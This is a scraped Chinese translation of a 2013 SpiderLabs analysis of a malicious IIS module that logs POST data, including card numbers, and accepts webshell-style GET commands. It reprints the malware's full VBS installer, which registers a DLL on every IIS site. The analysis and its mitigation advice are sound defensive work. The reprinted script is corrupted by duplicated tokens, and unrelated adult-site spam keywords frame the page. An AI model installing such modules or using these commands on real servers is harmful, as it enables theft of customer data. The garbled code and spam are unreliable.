成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

安全
最近,國(guó)外安全公司發(fā)現(xiàn)了一些以DLL動(dòng)態(tài)鏈接庫(kù)形式存在的IIS模塊存在惡意風(fēng)險(xiǎn),這些惡意模塊之所以受關(guān)注,很大原因是因?yàn)樗鼈兡芏氵^(guò)目前幾乎所有的反病毒產(chǎn)品,攻擊者借助這些模塊發(fā)送惡意POST數(shù)據(jù)包,并遵循恰當(dāng)?shù)臋C(jī)制以此來(lái)獲得敏感信息。

1、摘要

最近,國(guó)外安全公司發(fā)現(xiàn)了一些以DLL動(dòng)態(tài)鏈接庫(kù)形式存在的IIS模塊存在惡意風(fēng)險(xiǎn),這些惡意模塊之所以受關(guān)注,很大原因是因?yàn)樗鼈兡芏氵^(guò)目前幾乎所有的反病毒產(chǎn)品,攻擊者借助這些模塊發(fā)送惡意POST數(shù)據(jù)包,并遵循恰當(dāng)?shù)臋C(jī)制以此來(lái)獲得敏感信息。

這種惡意程序的目標(biāo)不僅僅局限于銀行、電子商務(wù)網(wǎng)站的加密數(shù)據(jù),同時(shí)還被用來(lái)獲取例如登錄賬戶及其他被發(fā)送到IIS實(shí)例上的數(shù)據(jù)(HTTP Header、MS-Chap令牌等)。同時(shí)要注意的是,這次發(fā)現(xiàn)的惡意軟件漏洞和之前報(bào)告的惡意軟件"Pony"沒(méi)有任何關(guān)系。Pony主要針對(duì)的是終端用戶,而這個(gè)IIS Module惡意程序主要是針對(duì)Web Server的。以下為報(bào)告譯文:

下面是這次發(fā)現(xiàn)的惡意程序在各大反病毒引擎上的檢查結(jié)果:

https://www.virustotal.com/en/file/587e784f8c54b49f25c01e0e8f71c205bd422e2b673fb7fbf28d721aa768e055/

事實(shí)證明,我所引用的這個(gè)DLL是一個(gè)IIS的原生安裝模塊,我想也該是時(shí)候?qū)@種惡意程序進(jìn)行一個(gè)總結(jié)了,之所以這么做,有以下2個(gè)原因:

a)在我寫這篇文章的時(shí)候,大部分的反病毒軟件都不會(huì)IIS目錄下的DLL模塊進(jìn)行必要的檢查(通過(guò)設(shè)置白名單等),這導(dǎo)致了IIS的重要模塊被替換后無(wú)法被殺毒軟件捕獲到異常。雖然病毒的安裝程序(用于進(jìn)行替換工作的程序)也只是被少數(shù)的反病毒軟件檢測(cè)出異常,因?yàn)檫@些檢測(cè)出異常的殺毒引擎大多數(shù)采取了"啟發(fā)式掃描";

b)我覺(jué)得這個(gè)惡意代碼非常的精巧。

2、介紹

讓我們先看一下這個(gè)病毒的安裝程序。程序允許帶許多參數(shù)變量以適應(yīng)不同的環(huán)境:

-path : [惡意程序?qū)⒈话惭b的路徑]
-i : [目標(biāo)URL地址, 例如 "/sensitive.aspx"
-u : [卸載惡意程序]
-is632 : [IIS6 32-Bit]
-is664 : [IIS6 64-Bit]

 

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

 

事實(shí)上,安裝程序非常簡(jiǎn)單。它包含有四個(gè)內(nèi)嵌的式DLL文件(在PE結(jié)構(gòu)的資源節(jié)區(qū)中),在安裝的時(shí)候根據(jù)目標(biāo)系統(tǒng)的版本進(jìn)行動(dòng)態(tài)選擇:

IIS6 + 32-Bit
IIS6 + 64-Bit
IIS7 + 32-Bit
IIS7 + 64-Bit

此外,這個(gè)ISN惡意程序也有一個(gè)VBS文件被嵌入到了PE的資源節(jié)區(qū)中(文件的內(nèi)容請(qǐng)參考引用部分),這個(gè)VBS腳本文件用于安裝或者卸載用于替換IIS模塊的惡意DLL文件(即上面說(shuō)到那4個(gè)DLL文件)。

一旦運(yùn)行,ISN.exe將執(zhí)行以下操作:

1. 將根據(jù)我們"-path"指定的位置,或者當(dāng)前的工作目錄。把VBS復(fù)制到這個(gè)路徑下,為后面的安裝做準(zhǔn)備,這個(gè)VBS文件將在安裝完成刪除,不會(huì)留下痕跡。
2. 創(chuàng)建一個(gè)配置文件([文件].cfg)在同一個(gè)目錄中。這個(gè)文件包含一個(gè)列表。
3. 惡意程序的目標(biāo)URL列表。
4. 檢查IIS版本以及攻擊目標(biāo)的操作系統(tǒng)架構(gòu)。
5. 提取相應(yīng)的DLL到安裝目錄(從PE的資源節(jié)區(qū)中)。
6. 調(diào)用VBS文件文件將惡意的DLL模塊安裝為IIS的模塊。(IIS只是通過(guò)DLL的文件名進(jìn)行動(dòng)態(tài)加載,即使這是一個(gè)惡意程序,DLL簽名技術(shù)在這里并不能起到防御作用)。

解壓運(yùn)行后的情況如下圖:

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

在安裝的過(guò)程中會(huì)產(chǎn)生一些日志信息,這些信息有助于我們判斷安裝是否成功以及失敗的原因:

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

一旦成功安裝的模塊,它將監(jiān)控在配置文件(isn.cfg)中指定的uri和dump(記錄)任何捕獲到的POST請(qǐng)求,將這些信息記錄到[fileName].log中。該模塊還將監(jiān)控QUERY_STRING參數(shù)(IIS中的GPC參數(shù),相當(dāng)于PHP中的$_REQUEST),并可以接受一些攻擊者發(fā)送的命令(就像一個(gè)webshell一樣)。我編寫了一個(gè)簡(jiǎn)單的IIS實(shí)例來(lái)演示這個(gè)過(guò)程如何發(fā)生。

3. 演示

如下我們可以看到,我已經(jīng)創(chuàng)建了一個(gè)簡(jiǎn)單的web表單,將模擬一個(gè)實(shí)際的電子商務(wù)網(wǎng)站。用戶輸入他們的名字和信用卡號(hào)碼和提交信息,然后腳本"/buy.aspx"返回用戶輸入的數(shù)據(jù)。

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

在本次演示中,我設(shè)置一個(gè)自簽名證書(self-signed certificate ),這樣所有的HTTP交互都通過(guò)SSL通信。

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

現(xiàn)在,所有的正常的HTTP業(yè)務(wù)通信都先和我們的惡意程序進(jìn)行了交互,這里要注意的,我們必須在配置文件中明確指明我們要"跟蹤"的腳本文件(例如,buy.aspx)。這樣,當(dāng)指定的.aspx腳本產(chǎn)生HTTP通信時(shí),ISN.EXE會(huì)自動(dòng)對(duì)捕獲到的數(shù)據(jù)進(jìn)行記錄

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

我前面提到的,這個(gè)惡意程序可以像webshell那樣工作,原因是因?yàn)樗瑫r(shí)監(jiān)測(cè)QUERY_STRING參數(shù)并對(duì)其中包含的"特征字符串"進(jìn)行匹配檢索。具體地說(shuō),它將尋找以下命令:

1. isn_getlog——的內(nèi)容并返回。日志文件
2. isn_logdel——刪除并。日志文件
3. isn_logpath——返回的路徑并。日志文件

這些命令可以簡(jiǎn)單地通過(guò)提供GET參數(shù)進(jìn)行遠(yuǎn)程發(fā)送。

"isn_getlog" example:

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

"isn_logdel" example:

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

"isn_logpath" example:

惡意軟件偽裝成IIS模塊加載 多數(shù)防毒產(chǎn)品免殺

4. 總結(jié)

總的來(lái)說(shuō),這個(gè)惡意軟件似乎沒(méi)有廣泛傳播,只有在一些個(gè)人的案例中出現(xiàn)。然而,極低的檢出率與惡意軟件的目標(biāo)功能的結(jié)合使這中惡意程序成為一個(gè)非常現(xiàn)實(shí)的威脅。

Trustwave WebDefend和ModSecurity可用于在"感染路徑"的起點(diǎn)阻止這個(gè)惡意程序,它們可以檢測(cè)是否敏感的用戶數(shù)據(jù),如信用卡號(hào)碼出現(xiàn)在出站數(shù)據(jù)中(outbound data)。ModSecurity的鏈?zhǔn)竭^(guò)濾規(guī)則可以很好的對(duì)付這個(gè)問(wèn)題,保證數(shù)據(jù)從入站到出站每一個(gè)環(huán)節(jié)的安全。

5. 引用

isn.exe
http://www.findthatfile.com/search-1990823-fEXE/software-tools-download-isn-exe.htm
HASP.EXE
http://www.xrite.com/product_overview.aspx?ID=593&Action=support&SupportID=3339
installer (9/48) – https://www.virustotal.com/en/file/587e784f8c54b49f25c01e0e8f71c205bd422e2b673fb7fbf28d721aa768e055/analysis/
VBS File (0/49) – https://www.virustotal.com/en/file/688b80289a0c3771c7cee689c50a61b1c5215e8e5ac39a1120b3c7e4f4ada002/analysis/
IIS6 64-Bit (0/49) – https://www.virustotal.com/en/file/956ed56ecc574f68b637e22add7c8e3cb0deea3b1e0dd02abea165bfcb7e3786/analysis/
IIS6 32-Bit (0/47) – https://www.virustotal.com/en/file/9f501c052f2d4f4b0954f6060c7111f272ae29f9d88188d37c961c38e13e3905/analysis/
IIS7+ 64-Bit (0/46) – https://www.virustotal.com/en/file/c6847600910ab196652a38e94ecf592e645d43025d1d61b3710b2f715238307b/analysis/
IIS7+ 32-Bit (0/47) – https://www.virustotal.com/en/file/157174f0b9be66e3c9090c95efdd1dd23b19e42aa671758ebac5540a173f760c/analysis/
Content of VBS File – https://gist.github.com/jgrunzweig/7840987
  1. OPTION EXPLICIT 
  2.   
  3. DIM CRLF, TAB 
  4. DIM strServer 
  5. DIM objWebService 
  6. DIM WebSvcObj 
  7.   
  8. dim webID 
  9. dim DllName 
  10. dim strScriptMap 
  11. dim objVDir 
  12. dim arrScriptMaps 
  13. dim arrScriptMapsTmp 
  14. dim ISAPIlist 
  15. dim bAdd 
  16. dim bRemove 
  17. dim i 
  18. dim j 
  19. dim cc 
  20.   
  21. TAB  = CHR( 9 ) 
  22. CRLF = CHR( 13 ) & CHR( 10 ) 
  23. ISAPIlist = 0 
  24. bAdd = 0 
  25. bRemove = 0 
  26. cc = 0 
  27.   
  28. If Wscript.Arguments.Count < 2 Then 
  29.     If Wscript.Arguments.Count = 0 Then 
  30.         Wscript.Echo "cscript isn.vbs /add <Path\FileName> - add to all web sites" 
  31.         Wscript.Echo "cscript isn.vbs /remove <FileName> - remove from all web sites" 
  32.         Wscript.Echo "cscript isn.vbs /isapilist <ID> - list ISAPI for web site <ID>
  33.         Wscript.Echo "cscript isn.vbs /weblist - list web sites" 
  34.         Wscript.Echo "Example:" 
  35.         Wscript.Echo "cscript isn.vbs /add C:\WINDOWS\isn\isn.dll" 
  36.         Wscript.Echo "cscript isn.vbs /remove isn.dll" 
  37.         Wscript.Quit 
  38.     Else 
  39.         If Wscript.Arguments(0)="/weblist" Then 
  40.         &#039;list web sites id and names 
  41.         SET objWebService = GetObject( "IIS://localhost/W3SVC" ) 
  42.         EnumWebsites(objWebService) 
  43.         Wscript.Quit 
  44.         Else 
  45.         Wscript.Echo "wrong param" 
  46.         Wscript.Quit 
  47.         End If 
  48.     End If 
  49. Else 
  50.  If Wscript.Arguments(0)="/isapilist" Then 
  51.     webID = Wscript.Arguments(1) 
  52.     ISAPIlist = 1 
  53.  ElseIf Wscript.Arguments(0)="/add" Then 
  54.     bAdd = 1 
  55.     DllName = Wscript.Arguments(1) 
  56.  ElseIf Wscript.Arguments(0)="/remove" Then 
  57.     bRemove = 1 
  58.     DllName = Wscript.Arguments(1) 
  59.  End If 
  60. End If 
  61.   
  62. If ( (bAdd=0) And (bRemove=0) And (ISAPIlist=0) ) Then 
  63.         Wscript.Echo "Wrong params!" 
  64.         Wscript.Quit 
  65. End If 
  66.   
  67. If bAdd=1 Then 
  68. SET objWebService = GetObject( "IIS://localhost/W3SVC" ) 
  69. strScriptMap = "*,"+DllName+",4,All" 
  70. AddToWebsites(objWebService) 
  71. Set WebSvcObj = GetObject("IIS://LocalHost/W3SVC") 
  72. WebSvcObj.EnableExtensionFile("*.dll") 
  73. WebSvcObj.SetInfo 
  74. End If 
  75.   
  76. If bRemove=1 Then 
  77. SET objWebService = GetObject( "IIS://localhost/W3SVC" ) 
  78. RemoveFromWebsites(objWebService) 
  79. Set WebSvcObj = GetObject("IIS://LocalHost/W3SVC") 
  80. WebSvcObj.DisableExtensionFile("*.dll") 
  81. WebSvcObj.SetInfo 
  82. Wscript.Echo DllName + " deleted" 
  83. End If 
  84.   
  85. If ISAPIlist=1 Then 
  86. Set objVDir = GetObject("IIS://LocalHost/W3SVC/"+webID+"/Root") 
  87. arrScriptMaps = objVDir.Get("ScriptMaps") 
  88. For i = LBound(arrScriptMaps) to UBound(arrScriptMaps) 
  89. Wscript.Echo arrScriptMaps(i) 
  90. Next 
  91. Wscript.Quit 
  92. End If 
  93.   
  94. FUNCTION AddToWebsites( objWebService ) 
  95.     DIM objWebServer, strBindings 
  96.   
  97.     FOR EACH objWebServer IN objWebService 
  98.         IF objWebserver.Class = "IIsWebServer" THEN 
  99.     Set objVDir = GetObject("IIS://LocalHost/W3SVC/"+objWebserver.Name+"/Root") 
  100.     arrScriptMaps = objVDir.Get("ScriptMaps") 
  101.     arrScriptMapsarrScriptMapsTmp = arrScriptMaps 
  102.     ReDim Preserve arrScriptMaps(UBound(arrScriptMaps) + 1) 
  103.     j = LBound(arrScriptMaps) 
  104.     arrScriptMaps(j) = strScriptMap 
  105.     j = 0 
  106.      
  107.     For i = 1 to UBound(arrScriptMaps) 
  108.         arrScriptMaps(i)=arrScriptMapsTmp(j) 
  109.         jj = j+1 
  110.     Next 
  111.      
  112.     objVDir.Put "ScriptMaps", arrScriptMaps 
  113.     objVDir.SetInfo 
  114.      
  115.     Wscript.Echo "Add "+DllName+" to Web Site ID "+objWebserver.Name+" success!" 
  116.         END IF 
  117.     NEXT 
  118.   
  119. END FUNCTION 
  120.   
  121. FUNCTION RemoveFromWebsites( objWebService ) 
  122.     DIM objWebServer, strBindings 
  123.   
  124.     FOR EACH objWebServer IN objWebService 
  125.         IF objWebserver.Class = "IIsWebServer" THEN 
  126.          
  127.         Do 
  128.         Set objVDir = GetObject("IIS://LocalHost/W3SVC/"+objWebserver.Name+"/Root") 
  129.      
  130.         arrScriptMaps = objVDir.Get("ScriptMaps") 
  131.         arrScriptMapsarrScriptMapsTmp = arrScriptMaps 
  132.         cc=0 
  133.          
  134.         For i = LBound(arrScriptMapsTmp) to UBound(arrScriptMapsTmp) 
  135.             If InStr(arrScriptMapsTmp(i), DllName)>0 then 
  136.                 arrScriptMapsTmp(i) = "" 
  137.                 cccc=cc+1 
  138.                 Wscript.Echo "Found "+DllName+" in "+objWebserver.Name+", delete" 
  139.                &#039;exit for &#039;exit loop 
  140.             End If 
  141.         Next 
  142.          
  143.         If cc=0 Then 
  144.             Wscript.Echo DllName+" in "+objWebserver.Name+" NOT found" 
  145.             Exit Do 
  146.         End If 
  147.          
  148.         ReDim Preserve arrScriptMaps(UBound(arrScriptMaps)-cc) 
  149.          
  150.         j = LBound(arrScriptMapsTmp) 
  151.         for i = LBound(arrScriptMapsTmp) to UBound(arrScriptMapsTmp) 
  152.         If arrScriptMapsTmp(i)<>"" Then 
  153.             arrScriptMaps(j)=arrScriptMapsTmp(i) 
  154.             jj = j+1 
  155.         End If 
  156.         Next 
  157.          
  158.         objVDir.Put "ScriptMaps", arrScriptMaps 
  159.         objVDir.SetInfo 
  160.         Exit Do 
  161.     Loop While False 
  162.   
  163.         END IF 
  164.     NEXT 
  165.   
  166. END FUNCTION 
  167.   
  168. FUNCTION EnumWebsites( objWebService ) 
  169.     DIM objWebServer, strBindings 
  170.   
  171.     FOR EACH objWebServer IN objWebService 
  172.         IF objWebserver.Class = "IIsWebServer" THEN 
  173.             WScript.Echo _ 
  174.                 "Site ID = " & objWebserver.Name & CRLF & _ 
  175.                 "Comment = """ & objWebServer.ServerComment & """ " & CRLF & _ 
  176.                 "State   = " & State2Desc( objWebserver.ServerState ) &#039;& CRLF & _ 
  177.                 &#039;"LogDir  = " & objWebServer.LogFileDirectory & _ 
  178.                 &#039;"" 
  179.   
  180.             &#039; Enumerate the HTTP bindings (ServerBindings) and 
  181.             &#039; SSL bindings (SecureBindings) 
  182.             &#039;strBindings = EnumBindings( objWebServer.ServerBindings ) & _ 
  183.             &#039;              EnumBindings( objWebServer.SecureBindings ) 
  184.             &#039;IF NOT strBindings = "" THEN 
  185.             &#039;    WScript.Echo "IP Address" & TAB & _ 
  186.             &#039;                 "Port" & TAB & _ 
  187.             &#039;                 "Host" & CRLF & _ 
  188.             &#039;                 strBindings 
  189.             &#039;END IF 
  190.         END IF 
  191.     NEXT 
  192.   
  193. END FUNCTION 
  194.   
  195. FUNCTION EnumBindings( objBindingList ) 
  196.     DIM i, strIP, strPort, strHost 
  197.     DIM reBinding, reMatch, reMatches 
  198.     SET reBinding = NEW RegExp 
  199.     reBinding.Pattern = "([^:]*):([^:]*):(.*)" 
  200.   
  201.     FOR i = LBOUND( objBindingList ) TO UBOUND( objBindingList ) 
  202.         &#039; objBindingList( i ) is a string looking like IP:Port:Host 
  203.         SET reMatches = reBinding.Execute( objBindingList( i ) ) 
  204.         FOR EACH reMatch IN reMatches 
  205.             strIP = reMatch.SubMatches( 0 ) 
  206.             strPort = reMatch.SubMatches( 1 ) 
  207.             strHost = reMatch.SubMatches( 2 ) 
  208.   
  209.             &#039; Do some pretty processing 
  210.             IF strIP = "" THEN strIP = "All Unassigned" 
  211.             IF strHost = "" THEN strHost = "*" 
  212.             IF LEN( strIP ) < 8 THEN strIPstrIP = strIP & TAB 
  213.   
  214.             EnumBindingsEnumBindings = EnumBindings & _ 
  215.                            strIP & TAB & _ 
  216.                            strPort & TAB & _ 
  217.                            strHost & TAB & _ 
  218.                            "" 
  219.         NEXT 
  220.   
  221.         EnumBindingsEnumBindings = EnumBindings & CRLF 
  222.     NEXT 
  223.   
  224. END FUNCTION 
  225.   
  226. FUNCTION State2Desc( nState ) 
  227.     SELECT CASE nState 
  228.     CASE 1 
  229.         State2Desc = "Starting (MD_SERVER_STATE_STARTING)" 
  230.     CASE 2 
  231.         State2Desc = "Started (MD_SERVER_STATE_STARTED)" 
  232.     CASE 3 
  233.         State2Desc = "Stopping (MD_SERVER_STATE_STOPPING)" 
  234.     CASE 4 
  235.         State2Desc = "Stopped (MD_SERVER_STATE_STOPPED)" 
  236.     CASE 5 
  237.         State2Desc = "Pausing (MD_SERVER_STATE_PAUSING)" 
  238.     CASE 6 
  239.         State2Desc = "Paused (MD_SERVER_STATE_PAUSED)" 
  240.     CASE 7 
  241.         State2Desc = "Continuing (MD_SERVER_STATE_CONTINUING)" 
  242.     CASE ELSE 
  243.         State2Desc = "Unknown state" 
  244.     END SELECT 
  245.   
  246. END FUNCTION 
  247.  
  248. The Curious Case of the Malicious IIS Module  
  249. Reference From: http://blog.spiderlabs.com/2013/12/the-curious-case-of-the-malicious-iis-module.html 
  250. Translated By: LittleHann 

 

責(zé)任編輯:藍(lán)雨淚 來(lái)源: FreebuF
相關(guān)推薦

2013-12-12 11:08:24

惡意軟件IIS服務(wù)器微軟

2023-08-30 07:19:49

2022-01-06 07:53:39

惡意軟件惡意程序網(wǎng)絡(luò)攻擊

2020-03-14 16:40:15

安全病毒黑客

2025-03-10 12:35:47

2025-04-09 11:36:23

2017-02-27 16:28:00

2022-09-01 10:28:10

惡意軟件惡意應(yīng)用挖礦

2017-04-01 02:36:15

2022-06-05 13:59:01

惡意軟件安卓Android

2021-10-29 16:28:48

Android惡意軟件網(wǎng)絡(luò)攻擊

2022-01-17 15:13:52

惡意軟件操作系統(tǒng)

2022-03-17 11:49:55

惡意軟件安全工具釣魚攻擊

2024-07-22 13:56:02

2014-09-01 10:33:34

2019-01-07 08:07:13

2011-05-16 15:42:06

2022-03-22 15:58:18

惡意軟件BitRAT遠(yuǎn)程訪問(wèn)木馬

2021-04-30 07:49:58

FluBot惡意軟件木馬

2011-08-30 10:46:42

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 国产精品永久免费 | 免费观看一级黄色录像 | 国产亚洲一区二区三区在线观看 | 高清视频一区二区三区 | 成人精品国产免费网站 | 欧洲精品在线观看 | 色综合99 | 欧美国产精品一区二区三区 | 国产欧美日韩精品在线观看 | 中文字幕第90页 | 91丨九色丨国产在线 | 国产欧美日韩在线播放 | 日韩欧美在线免费观看视频 | 国产精品综合视频 | 国产成人精品一区二区 | 亚洲婷婷六月天 | 久久一区二区三区四区 | 日本免费在线 | 97人澡人人添人人爽欧美 | 黄色大片毛片 | 久久只有精品 | 国产二区在线播放 | 国产午夜精品久久久 | 国产一区二区免费 | 精品国产乱码久久久久久1区2区 | 成人在线免费电影 | 日日干日日操 | 日本成人中文字幕在线观看 | 日韩欧美在线观看视频网站 | 成人av网站在线观看 | 日韩在线观看 | 中文字幕国产一区 | 色爱综合网 | 久久91av | 国产日韩欧美激情 | 欧美综合在线观看 | 日韩欧美一区二区在线播放 | 成人性视频在线播放 | 在线一区二区三区 | 九九久久精品 | 久久精品成人热国产成 |